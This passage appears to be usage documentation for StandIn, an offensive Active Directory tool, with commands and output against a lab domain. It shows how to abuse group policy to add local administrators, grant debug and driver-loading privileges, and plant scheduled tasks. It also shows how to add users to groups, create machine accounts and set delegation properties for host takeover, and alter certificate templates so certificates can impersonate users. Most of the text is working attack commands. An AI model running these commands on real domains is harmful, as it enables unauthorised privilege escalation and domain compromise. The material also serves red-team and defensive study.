[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=user 001
Path : LDAP://CN=user 001,CN=Users,DC=redhook,DC=local
[*] SamAccountName : user001
DistinguishedName : CN=user 001,CN=Users,DC=redhook,DC=local
[+] Adding servicePrincipalName : MSSQL/Alchimiae
|_ Success
C:\> StandIn.exe --object samaccountname=user001 --filter serviceprincipalname
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=user 001
Path : LDAP://CN=user 001,CN=Users,DC=redhook,DC=local
[?] Iterating object properties
|_ Applying property filter => serviceprincipalname
[+] serviceprincipalname
|_ HTTP/Alchimiae
|_ MSSQL/Alchimiae
C:\>StandIn.exe --setspn user001 --principal HTTP/Alchimiae --remove
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=user 001
Path : LDAP://CN=user 001,CN=Users,DC=redhook,DC=local
[*] SamAccountName : user001
DistinguishedName : CN=user 001,CN=Users,DC=redhook,DC=local
ServicePrincipalName : HTTP/Alchimiae
MSSQL/Alchimiae
[+] Removing servicePrincipalName : HTTP/Alchimiae
|_ Success
C:\> StandIn.exe --object samaccountname=user001 --filter serviceprincipalname
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=user 001
Path : LDAP://CN=user 001,CN=Users,DC=redhook,DC=local
[?] Iterating object properties
|_ Applying property filter => serviceprincipalname
[+] serviceprincipalname
|_ MSSQL/Alchimiae
This function enumerates all accounts that are permitted to perform unconstrained, constrained, or resource-based constrained delegation. These assets can be used to expand access or achieve objectives.
Return all accounts that have either unconstrained or constrained delegation permissions, or have inbound resource-based constrained delegation privileges.
C:\> StandIn.exe --delegation
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Found 3 object(s) with unconstrained delegation..
[*] SamAccountName : M-2019-03$
DistinguishedName : CN=M-2019-03,OU=Servers,OU=OCCULT,DC=main,DC=redhook,DC=local
userAccountControl : WORKSTATION_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION
[*] SamAccountName : M-W16-DC01$
DistinguishedName : CN=M-W16-DC01,OU=Domain Controllers,DC=main,DC=redhook,DC=local
userAccountControl : SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION
[*] SamAccountName : M-W19-DC01$
DistinguishedName : CN=M-W19-DC01,OU=Domain Controllers,DC=main,DC=redhook,DC=local
userAccountControl : SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION
[?] Found 2 object(s) with constrained delegation..
[*] SamAccountName : M-2019-04$
DistinguishedName : CN=M-2019-04,OU=Servers,OU=OCCULT,DC=main,DC=redhook,DC=local
msDS-AllowedToDelegateTo : HOST/m-w16-dc01.main.redhook.local/main.redhook.local
HOST/m-w16-dc01.main.redhook.local
HOST/M-W16-DC01
HOST/m-w16-dc01.main.redhook.local/MAIN
HOST/M-W16-DC01/MAIN
Protocol Transition : False
userAccountControl : WORKSTATION_TRUST_ACCOUNT
[*] SamAccountName : M-2019-05$
DistinguishedName : CN=M-2019-05,OU=Servers,OU=OCCULT,DC=main,DC=redhook,DC=local
msDS-AllowedToDelegateTo : cifs/m-2012r2-03.main.redhook.local
cifs/M-2012R2-03
Protocol Transition : True
userAccountControl : WORKSTATION_TRUST_ACCOUNT, TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION
[?] Found 1 object(s) with resource-based constrained delegation..
[*] SamAccountName : M-10-1909-01$
DistinguishedName : CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
Inbound Delegation : Server Admins [GROUP]
userAccountControl : WORKSTATION_TRUST_ACCOUNT
This function provides situational awareness by finding all domain controllers and listing some of their properties including their role assignments.
Get all domain controllers.
C:\> StandIn.exe --dc
[?] Using DC : m-w16-dc01.main.redhook.local
|_ Domain : main.redhook.local
[*] Host : m-w16-dc01.main.redhook.local
Domain : main.redhook.local
Forest : main.redhook.local
SiteName : Default-First-Site-Name
IP : 10.42.54.5
OSVersion : Windows Server 2016 Datacenter
Local System Time UTC : Tuesday, 03 November 2020 03:29:17
Role : SchemaRole
NamingRole
PdcRole
RidRole
InfrastructureRole
[*] Host : m-w19-dc01.main.redhook.local
Domain : main.redhook.local
Forest : main.redhook.local
SiteName : Default-First-Site-Name
IP : 10.42.54.13
OSVersion : Windows Server 2019 Datacenter
Local System Time UTC : Tuesday, 03 November 2020 03:29:17
This function provides situational awareness by finding all domain trusts.
Get all trust relationships for the current domain.
C:\> StandIn.exe --trust
[?] Using DC : m-w16-dc01.main.redhook.local
|_ Domain : main.redhook.local
[>] Source : main.redhook.local
Target : redhook.local
TrustDirection : Bidirectional
TrustType : ParentChild
These functions deal specifically with GPO manipulation.
This function can enumerate all of the domain
Group Policyobjects. Optionally you can wildcard--filterand--limitthe amount of entries returned. You can also query the ACL's for the GPO objects with--acl.
Enumerate GPO objects and review GPO ACL's.
C:\> StandIn.exe --gpo
[?] Using DC : m-w16-dc01.main.redhook.local
[+] GPO result count : 3
|_ Result limit : 50
[?] Object : CN={6AC1786C-016F-11D2-945F-00C04fB984F9}
Path : LDAP://CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=redhook,DC=local
DisplayName : Default Domain Controllers Policy
CN : {6AC1786C-016F-11D2-945F-00C04fB984F9}
GPCFilesysPath : \\redhook.local\sysvol\redhook.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
GPCMachineExtensionnames : [{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
WhenCreated : 6/3/2021 10:30:25 AM
WhenChanged : 6/3/2021 10:30:25 AM
[?] Object : CN={31B2F340-016D-11D2-945F-00C04FB984F9}
Path : LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=redhook,DC=local
DisplayName : Default Domain Policy
CN : {31B2F340-016D-11D2-945F-00C04FB984F9}
GPCFilesysPath : \\redhook.local\sysvol\redhook.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
GPCMachineExtensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}]
WhenCreated : 6/3/2021 10:30:25 AM
WhenChanged : 6/5/2021 11:59:55 PM
[?] Object : CN={028A7368-C524-46AA-B27A-CE8BDAC4EA66}
Path : LDAP://CN={028A7368-C524-46AA-B27A-CE8BDAC4EA66},CN=Policies,CN=System,DC=redhook,DC=local
DisplayName : Shards
CN : {028A7368-C524-46AA-B27A-CE8BDAC4EA66}
GPCFilesysPath : \\redhook.local\SysVol\redhook.local\Policies\{028A7368-C524-46AA-B27A-CE8BDAC4EA66}
GPCMachineExtensionnames : [{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
WhenCreated : 6/4/2021 2:11:43 PM
WhenChanged : 6/4/2021 11:33:33 PM
C:\> StandIn.exe --gpo --filter Shards --acl
[?] Using DC : m-w16-dc01.main.redhook.local
[+] GPO result count : 1
|_ Result limit : 50
|_ Applying search filter
[?] Object : CN={028A7368-C524-46AA-B27A-CE8BDAC4EA66}
Path : LDAP://CN={028A7368-C524-46AA-B27A-CE8BDAC4EA66},CN=Policies,CN=System,DC=redhook,DC=local
GPCFilesysPath : \\redhook.local\SysVol\redhook.local\Policies\{028A7368-C524-46AA-B27A-CE8BDAC4EA66}
Path : OK
[+] Account : CREATOR OWNER
Type : Allow
Rights : FullControl
Inherited ACE : False
Propagation : InheritOnly
[+] Account : NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
Type : Allow
Rights : ReadAndExecute, Synchronize
Inherited ACE : False
Propagation : None
[+] Account : NT AUTHORITY\Authenticated Users
Type : Allow
Rights : ReadAndExecute, Synchronize
Inherited ACE : False
Propagation : None
[+] Account : NT AUTHORITY\SYSTEM
Type : Allow
Rights : FullControl
Inherited ACE : False
Propagation : None
[+] Account : REDHOOK\Domain Admins
Type : Allow
Rights : FullControl
Inherited ACE : False
Propagation : None
[+] Account : REDHOOK\Enterprise Admins
Type : Allow
Rights : FullControl
Inherited ACE : False
Propagation : None
[+] Account : REDHOOK\user001
Type : Allow
Rights : FullControl
Inherited ACE : False
Propagation : None
With the appropriate permissions it is possible to add a domain user to the
BUILTIN\Administratorson a vulnerable GPO.
Add user to to the BUILTIN\Administrators group for all linked computer objects tied to the Shards GPO. This function can both create the required files and also update existing files. Use with caution.
C:\> StandIn.exe --gpo --filter Shards --localadmin user002
[?] Using DC : m-w16-dc01.main.redhook.local
[+] GPO Object Found
Object : CN={58890948-8DE3-4A39-8C40-F68004186693}
Path : LDAP://CN={58890948-8DE3-4A39-8C40-F68004186693},CN=Policies,CN=System,DC=redhook,DC=local
GP Path : \\redhook.local\SysVol\redhook.local\Policies\{58890948-8DE3-4A39-8C40-F68004186693}
[+] User Object Found
Object : CN=user 002
Path : LDAP://CN=user 002,CN=Users,DC=redhook,DC=local
SID : S-1-5-21-315358687-3711474269-2098994107-1106
[?] GPO Version
User : 0
Computer : 0
[+] Writing GPO changes
|_ Creating GptTmpl.inf
|_ Updating gpt.inf
|_ Updating AD object
|_ Incrementing version number
|_ Creating gPCMachineExtensionNames
With the appropriate permissions it is possible to enable a token privilege for a domain user on a vulnerable GPO.
Add token privilege to a user account for all linked computer objects tied to the Shards GPO. This function can both create the required files and also update existing files. Use with caution.
C:\Users\user001\Desktop>StandIn.exe --gpo --filter Shards --setuserrights user002 --grant "SeDebugPrivilege,SeLoadDriverPrivilege"
[+] Validating account rights
|_ Rights count: 2
|_ SeDebugPrivilege
|_ SeLoadDriverPrivilege
[?] Using DC : m-w16-dc01.main.redhook.local
[+] GPO Object Found
Object : CN={58890948-8DE3-4A39-8C40-F68004186693}
Path : LDAP://CN={58890948-8DE3-4A39-8C40-F68004186693},CN=Policies,CN=System,DC=redhook,DC=local
GP Path : \\redhook.local\SysVol\redhook.local\Policies\{58890948-8DE3-4A39-8C40-F68004186693}
[+] User Object Found
Object : CN=user 002
Path : LDAP://CN=user 002,CN=Users,DC=redhook,DC=local
SID : S-1-5-21-315358687-3711474269-2098994107-1106
[?] GPO Version
User : 0
Computer : 1
[+] Writing GPO changes
|_ Updating existing GptTmpl.inf
|_ Adding GPO Privileges
|_ Updating revision
|_ Updating gpt.inf
|_ Updating AD object
|_ Incrementing version number
|_ Updating gPCMachineExtensionNames
With the appropriate permissions it is possible to add an immediate task to either the
UserorComputercomponent of the GPO. Optionally, these tasks can be narrowed to apply to a single user or single computer.
Add a generic Computer task which will execute for all linked computer objects tied to the Shards GPO. Also add a targeted User task that will only execute for a specific domain user. This function can both create the required files and also update existing files. Use with caution.
C:\Users\user001\Desktop>StandIn.exe --gpo --filter Shards --tasktype computer --taskname Liber --author "REDHOOK\Administrator" --command "C:\I\do\the\thing.exe" --args "with args"
[?] Using DC : m-w16-dc01.main.redhook.local
[+] GPO Object Found
Object : CN={58890948-8DE3-4A39-8C40-F68004186693}
Path : LDAP://CN={58890948-8DE3-4A39-8C40-F68004186693},CN=Policies,CN=System,DC=redhook,DC=local
GP Path : \\redhook.local\SysVol\redhook.local\Policies\{58890948-8DE3-4A39-8C40-F68004186693}
[?] GPO Version
User : 0
Computer : 2
[+] Writing GPO changes
|_ Creating ScheduledTasks.xml
|_ Updating gpt.inf
|_ Updating AD object
|_ Incrementing version number
|_ Updating gPCMachineExtensionNames
C:\> StandIn.exe --gpo --filter Shards --tasktype user --taskname Ivonis --author "REDHOOK\Administrator" --command "C:\I\do\the\thing.exe" --args "with args" --target "REDHOOK\user001" --targetsid S-1-5-21-315358687-3711474269-2098994107-1105
[?] Using DC : m-w16-dc01.main.redhook.local
[+] GPO Object Found
Object : CN={58890948-8DE3-4A39-8C40-F68004186693}
Path : LDAP://CN={58890948-8DE3-4A39-8C40-F68004186693},CN=Policies,CN=System,DC=redhook,DC=local
GP Path : \\redhook.local\SysVol\redhook.local\Policies\{58890948-8DE3-4A39-8C40-F68004186693}
[?] GPO Version
User : 0
Computer : 3
[+] Writing GPO changes
|_ Creating ScheduledTasks.xml
|_ Updating gpt.inf
|_ Updating AD object
|_ Incrementing version number
|_ Creating gPCUserExtensionNames
While the previous GPO functions offer powerful exploitation primitives it may be useful to have the ability to manually edit
GPO'sonSysVol. Once any GPO has been manually modified then the AD object version should be sync'd to correctly propagate the changes. This function does that.
Increase the User or Computer GPO version on the associated AD object.
C:\Users\user001\Desktop>StandIn.exe --gpo --filter Shards --increase --tasktype user
[?] Using DC : m-w16-dc01.main.redhook.local
[+] GPO Object Found
Object : CN={58890948-8DE3-4A39-8C40-F68004186693}
Path : LDAP://CN={58890948-8DE3-4A39-8C40-F68004186693},CN=Policies,CN=System,DC=redhook,DC=local
GP Path : \\redhook.local\SysVol\redhook.local\Policies\{58890948-8DE3-4A39-8C40-F68004186693}
[?] Current GPO Versioning
User : 1
Computer : 3
--> Incrementing user version
C:\Users\user001\Desktop>StandIn.exe --gpo --filter Shards --increase --tasktype computer
[?] Using DC : m-w16-dc01.main.redhook.local
[+] GPO Object Found
Object : CN={58890948-8DE3-4A39-8C40-F68004186693}
Path : LDAP://CN={58890948-8DE3-4A39-8C40-F68004186693},CN=Policies,CN=System,DC=redhook,DC=local
GP Path : \\redhook.local\SysVol\redhook.local\Policies\{58890948-8DE3-4A39-8C40-F68004186693}
[?] Current GPO Versioning
User : 2
Computer : 3
--> Incrementing computer version
This function attempts to display some basic policy information for situational awareness.
Read the Default Domain Policy and extract some user/session policy information. If the default policy has been renamed you can specify it with --filter, alternatively you can perform an --object query for the domain root (e.g distinguishedname=DC=redhook,DC=local).
C:\> StandIn.exe --policy
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN={31B2F340-016D-11D2-945F-00C04FB984F9}
Path : LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=redhook,DC=local
Policy Root : \\redhook.local\sysvol\redhook.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
[+] Domain Policy
|_ MinimumPasswordAge : 1
|_ MaximumPasswordAge : 42
|_ MinimumPasswordLength : 7
|_ PasswordComplexity : 1
|_ PasswordHistorySize : 24
|_ LockoutBadCount : 5
|_ ResetLockoutCount : 30
|_ LockoutDuration : 30
|_ LSAAnonymousNameLookup : 0
|_ Kerberos max User ticket lifetime : 10
|_ Kerberos max Service ticket lifetime : 600
|_ Kerberos max User ticket renewal lifetime : 7
This function fetches domain DNS information from AD and supports wildcard filtering.
Read DNS entries under specific CN=MicrosoftDNS objects and parse the binary DNS data. The search base can be adjusted by specifying --legacy or --forest. You can also limit the results which are returned with --limit.
C:\Users\user001\Desktop>StandIn.exe --dns --filter RedHook-CLI
[+] Search Base: LDAP://DC=redhook.local,CN=MicrosoftDNS,DC=DomainDnsZones,DC=redhook,DC=local
[+] Object : RedHook-CLI-01
|_ DNS_RPC_RECORD_A : 10.0.0.100
[+] Object : RedHook-CLI-02
|_ DNS_RPC_RECORD_A : 10.0.0.101
These functions deal specifically with domain groups.
This function provides situational awareness, listing all members of a domain group including their type (user or nested group). As input it can also take a
samAccountNameand it will return which groups the user is part of.
Enumerate group membership or user memberships and provide rudementary details for the member objects.
C:\> StandIn.exe --group "Server Admins"
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Type : Group resolution
Group : Server Admins
[+] Members
[?] Path : LDAP://CN=Workstation Admins,OU=Groups,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : Workstation Admins
Type : SAM_GROUP_OBJECT
SID : S-1-5-21-1293271031-3053586410-2290657902-1108
[?] Path : LDAP://CN=Server Admin 001,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : srvadmin001
Type : SAM_USER_OBJECT
SID : S-1-5-21-1293271031-3053586410-2290657902-1111
[?] Path : LDAP://CN=Server Admin 002,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : srvadmin002
Type : SAM_USER_OBJECT
SID : S-1-5-21-1293271031-3053586410-2290657902-1184
[?] Path : LDAP://CN=Server Admin 003,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : srvadmin003
Type : SAM_USER_OBJECT
SID : S-1-5-21-1293271031-3053586410-2290657902-1185
[?] Path : LDAP://CN=Server Admin 004,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : srvadmin004
Type : SAM_USER_OBJECT
SID : S-1-5-21-1293271031-3053586410-2290657902-1186
[?] Path : LDAP://CN=Server Admin 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : srvadmin005
Type : SAM_USER_OBJECT
SID : S-1-5-21-1293271031-3053586410-2290657902-1187
[?] Path : LDAP://CN=SimCritical,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : SimCritical
Type : SAM_USER_OBJECT
SID : S-1-5-21-1293271031-3053586410-2290657902-1204
C:\> StandIn.exe --group user001
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Type : User resolution
User : user 001
[+] Memberships
[?] Path : LDAP://<SID=010500000000000515000000dffdcb125d9a38ddbb1b1c7d01020000>
samAccountName : Domain Users
Type : SAM_GROUP_OBJECT
SID : S-1-5-21-315358687-3711474269-2098994107-513
With appropriate access the operator can add or remove an NTAccount from a domain group.
Add an NTAccount identifier to a domain group. Normally this would be a user but it could also be a group. Finally, remove the NTAccount identifier from the domain group.
C:\> StandIn.exe --group lowprivbutmachineaccess
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Type : Group resolution
Group : lowprivbutmachineaccess
[+] Members
[?] Path : LDAP://CN=s4uUser,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : s4uUser
Type : User
SID : S-1-5-21-1293271031-3053586410-2290657902-1197
C:\> StandIn.exe --group lowprivbutmachineaccess --ntaccount "MAIN\user001" --add
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Group : lowPrivButMachineAccess
GUID : 37e3d957-af52-4cc6-8808-56330f8ec882
[+] Adding user to group
|_ Success
C:\> StandIn.exe --group lowprivbutmachineaccess
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Type : Group resolution
Group : lowprivbutmachineaccess
[+] Members
[?] Path : LDAP://CN=User 001,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : user001
Type : User
SID : S-1-5-21-1293271031-3053586410-2290657902-1106
[?] Path : LDAP://CN=s4uUser,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : s4uUser
Type : User
SID : S-1-5-21-1293271031-3053586410-2290657902-1197
C:\> StandIn.exe --group testgroup --ntaccount "MAIN\user001" --remove
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Group : lowPrivButMachineAccess
GUID : 37e3d957-af52-4cc6-8808-56330f8ec882
[+] Removing user from group
|_ Success
These functions specifically are for machine operations and expect the machine name as an input.
The operator may wish to create a machine object in order to perform a resource based constrained delegation attack. By default any domain user has the ability to create up to 10 machines on the local domain.
Create a new machine object with a random password, user ms-DS-MachineAccountQuota applies to this operation.
C:\> StandIn.exe --computer M-1337-b33f --make
[?] Using DC : m-w16-dc01.main.redhook.local
|_ Domain : main.redhook.local
|_ DN : CN=M-1337-b33f,CN=Computers,DC=main,DC=redhook,DC=local
|_ Password : MlCGkaacS5SRUOt
[+] Machine account added to AD..
The ms-DS-MachineAccountQuota property exists in the domain root object. If you need to verify the quota you can perform an object search as shown below.
C:\> StandIn.exe --object ms-DS-MachineAccountQuota=*
Standard users do not have the ability to delete a machine object, however a user that create a machine can thereafter disable the machine object.
Disable a machine that was previously created. This action should be performed in the context of the same user that created the machine. Note that non-elevated users can't delete machine objects only disable them.
C:\> StandIn.exe --computer M-1337-b33f --disable
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=M-1337-b33f
Path : LDAP://CN=M-1337-b33f,CN=Computers,DC=main,DC=redhook,DC=local
[+] Machine account currently enabled
|_ Account disabled..
With elevated AD privileges the operator can delete a machine object, such as once create earlier in the attack chain.
Use an elevated context to delete a machine object.
C:\> StandIn.exe --computer M-1337-b33f --delete
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=M-1337-b33f
Path : LDAP://CN=M-1337-b33f,CN=Computers,DC=main,DC=redhook,DC=local
[+] Machine account deleted from AD
With write access to a machine object this function allows the operator to add an
msDS-AllowedToActOnBehalfOfOtherIdentityproperty to the machine which is required to perform a resource based constrained delegation attack.
Add an msDS-AllowedToActOnBehalfOfOtherIdentity propert to the machine along with a SID to facilitate host takeover using resource based constrained delegation.
C:\> StandIn.exe --computer m-10-1909-03 --sid S-1-5-21-1293271031-3053586410-2290657902-1205
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=M-10-1909-03
Path : LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
[+] SID added to msDS-AllowedToActOnBehalfOfOtherIdentity
C:\> StandIn.exe --object samaccountname=m-10-1909-03$
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=M-10-1909-03
Path : LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
[?] Iterating object properties
[+] logoncount
|_ 107
[+] codepage
|_ 0
[+] objectcategory
|_ CN=Computer,CN=Schema,CN=Configuration,DC=main,DC=redhook,DC=local
[+] iscriticalsystemobject
|_ False
[+] operatingsystem
|_ Windows 10 Enterprise
[+] usnchanged
|_ 195771
[+] instancetype
|_ 4
[+] name
|_ M-10-1909-03
[+] badpasswordtime
|_ 7/9/2020 5:07:11 PM UTC
[+] pwdlastset
|_ 10/29/2020 6:44:08 PM UTC
[+] serviceprincipalname
|_ TERMSRV/M-10-1909-03
|_ TERMSRV/m-10-1909-03.main.redhook.local
|_ WSMAN/m-10-1909-03
|_ WSMAN/m-10-1909-03.main.redhook.local
|_ RestrictedKrbHost/M-10-1909-03
|_ HOST/M-10-1909-03
|_ RestrictedKrbHost/m-10-1909-03.main.redhook.local
|_ HOST/m-10-1909-03.main.redhook.local
[+] objectclass
|_ top
|_ person
|_ organizationalPerson
|_ user
|_ computer
[+] badpwdcount
|_ 0
[+] samaccounttype
|_ SAM_MACHINE_ACCOUNT
[+] lastlogontimestamp
|_ 10/29/2020 12:29:26 PM UTC
[+] usncreated
|_ 31127
[+] objectguid
|_ c02cff97-4bfd-457c-a568-a748b0725c2f
[+] localpolicyflags
|_ 0
[+] whencreated
|_ 7/9/2020 5:05:08 PM
[+] adspath
|_ LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
[+] useraccountcontrol
|_ WORKSTATION_TRUST_ACCOUNT
[+] cn
|_ M-10-1909-03
[+] countrycode
|_ 0
[+] primarygroupid
|_ 515
[+] whenchanged
|_ 11/2/2020 7:55:14 PM
[+] operatingsystemversion
|_ 10.0 (18363)
[+] dnshostname
|_ m-10-1909-03.main.redhook.local
[+] dscorepropagationdata
|_ 10/30/2020 6:56:30 PM
|_ 10/30/2020 10:55:22 AM
|_ 10/29/2020 4:58:51 PM
|_ 10/29/2020 4:58:29 PM
|_ 1/1/1601 12:00:01 AM
[+] lastlogon
|_ 11/2/2020 9:07:20 AM UTC
[+] distinguishedname
|_ CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
[+] msds-supportedencryptiontypes
|_ RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96
[+] samaccountname
|_ M-10-1909-03$
[+] objectsid
|_ S-1-5-21-1293271031-3053586410-2290657902-1127
[+] lastlogoff
|_ 0
[+] msds-allowedtoactonbehalfofotheridentity
|_ BinLen : 36
|_ AceQualifier : AccessAllowed
|_ IsCallback : False
|_ OpaqueLength : 0
|_ AccessMask : 983551
|_ SID : S-1-5-21-1293271031-3053586410-2290657902-1205
|_ AceType : AccessAllowed
|_ AceFlags : None
|_ IsInherited : False
|_ InheritanceFlags : None
|_ PropagationFlags : None
|_ AuditFlags : None
[+] accountexpires
|_ 0x7FFFFFFFFFFFFFFF
With write access to a machine object this function allows the operator to remove a previously added
msDS-AllowedToActOnBehalfOfOtherIdentityproperty from the machine.
Remove previously created msDS-AllowedToActOnBehalfOfOtherIdentity property from a machine.
C:\> StandIn.exe --computer m-10-1909-03 --remove
[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=M-10-1909-03
Path : LDAP://CN=M-10-1909-03,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
[+] msDS-AllowedToActOnBehalfOfOtherIdentity property removed..
These are companion functions to Certify. They can facilitate template attacks where the default template state is not usable out-of-the-box.
This function can enumerate all
domain CA'sand will list allpublished templates. Optionally you can wildcard--filteron the full template name or a portion of the name.
Search all published templates and, in this case, filter the output to return only templates matching web.
C:\>StandIn.exe --adcs --filter web
[+] Search Base : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local
[>] Certificate Authority : redhook-RH-DC01-CA
|_ DNS Hostname : RH-DC01.redhook.local
|_ Cert DN : CN=redhook-RH-DC01-CA, DC=redhook, DC=local
|_ GUID : e1885348-e2b3-4e02-9147-54c4c430bc53
|_ Published Templates : CrossCA
DirectoryEmailReplication
DomainControllerAuthentication
KerberosAuthentication
EFSRecovery
EFS
DomainController
WebServer
Machine
User
SubCA
Administrator
[>] Publishing CA : redhook-RH-DC01-CA
|_ Template : WebServer
|_ Schema Version : 1
|_ pKIExpirationPeriod : 2 years
|_ pKIOverlapPeriod : 6 weeks
|_ Enroll Flags : NONE
|_ Name Flags : ENROLLEE_SUPPLIES_SUBJECT
|_ pKIExtendedKeyUsage : Server Authentication
|_ Owner : REDHOOK\Enterprise Admins
|_ Permission Identity : REDHOOK\Domain Admins
| |_ Type : Allow
| |_ Permission : CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner
| |_ Object : ANY
|_ Permission Identity : REDHOOK\Domain Users
| |_ Type : Allow
| |_ Permission : GenericAll
| |_ Object : ANY
|_ Permission Identity : REDHOOK\Enterprise Admins
| |_ Type : Allow
| |_ Permission : CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner
| |_ Object : ANY
|_ Permission Identity : REDHOOK\Domain Admins
| |_ Type : Allow
| |_ Permission : ReadProperty, WriteProperty, ExtendedRight
| |_ Object : Certificate-Enrollment
|_ Permission Identity : REDHOOK\Enterprise Admins
| |_ Type : Allow
| |_ Permission : ReadProperty, WriteProperty, ExtendedRight
| |_ Object : Certificate-Enrollment
|_ Created : 11/24/2021 4:37:30 PM
|_ Modified : 11/29/2021 1:57:16 PM
In order to be able to generate certificates which can be used to impersonate Domain users, the certificate template
pKIExtendedKeyUsageproperty has to contain theClient Authenticationflag. With the appropriateobject permissionsthis function allows the operator to add or remove that flag from the template.
Add/remove Client Authentication flag from the WebServer template. Here the --filter flag has to match the template name exactly.
C:\>StandIn.exe --adcs --filter WebServer --clientauth --add
[+] Search Base : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local
[>] Publishing CA : redhook-RH-DC01-CA
|_ Template : WebServer
|_ Enroll Flags : NONE
|_ Name Flags : ENROLLEE_SUPPLIES_SUBJECT
|_ pKIExtendedKeyUsage : Server Authentication
|_ Created : 11/24/2021 4:37:30 PM
|_ Modified : 11/29/2021 2:40:06 PM
[+] Adding pKIExtendedKeyUsage : Client Authentication
|_ Success
C:\>StandIn.exe --adcs --filter WebServer --clientauth --remove
[+] Search Base : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local
[>] Publishing CA : redhook-RH-DC01-CA
|_ Template : WebServer
|_ Enroll Flags : NONE
|_ Name Flags : ENROLLEE_SUPPLIES_SUBJECT
|_ pKIExtendedKeyUsage : Client Authentication
| Server Authentication
|_ Created : 11/24/2021 4:37:30 PM
|_ Modified : 11/29/2021 1:57:16 PM
[+] Removing pKIExtendedKeyUsage : Client Authentication
|_ Success
In order to be able to provide an arbitrary user identity when making certificate requests, the certificate template
msPKI-Certificate-Name-Flagproperty has to contain theENROLLEE_SUPPLIES_SUBJECTflag. With the appropriateobject permissionsthis function allows the operator to add or remove that flag from the template.
Add/remove ENROLLEE_SUPPLIES_SUBJECT flag from the WebServer template. Here the --filter flag has to match the template name exactly.
C:\>StandIn.exe --adcs --filter WebServer --ess --add
[+] Search Base : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local
[>] Publishing CA : redhook-RH-DC01-CA
|_ Template : WebServer
|_ Enroll Flags : NONE
|_ Name Flags : 0
|_ pKIExtendedKeyUsage : Client Authentication
| Server Authentication
|_ Created : 11/24/2021 4:37:30 PM
|_ Modified : 11/29/2021 2:50:34 PM
[+] Adding msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
|_ Success
C:\>StandIn.exe --adcs --filter WebServer --ess --remove
[+] Search Base : LDAP://CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=redhook,DC=local
[>] Publishing CA : redhook-RH-DC01-CA
|_ Template : WebServer
|_ Enroll Flags : NONE
|_ Name Flags : ENROLLEE_SUPPLIES_SUBJECT
|_ pKIExtendedKeyUsage : Client Authentication
| Server Authentication
|_ Created : 11/24/2021 4:37:30 PM
|_ Modified : 11/29/2021 2:40:08 PM
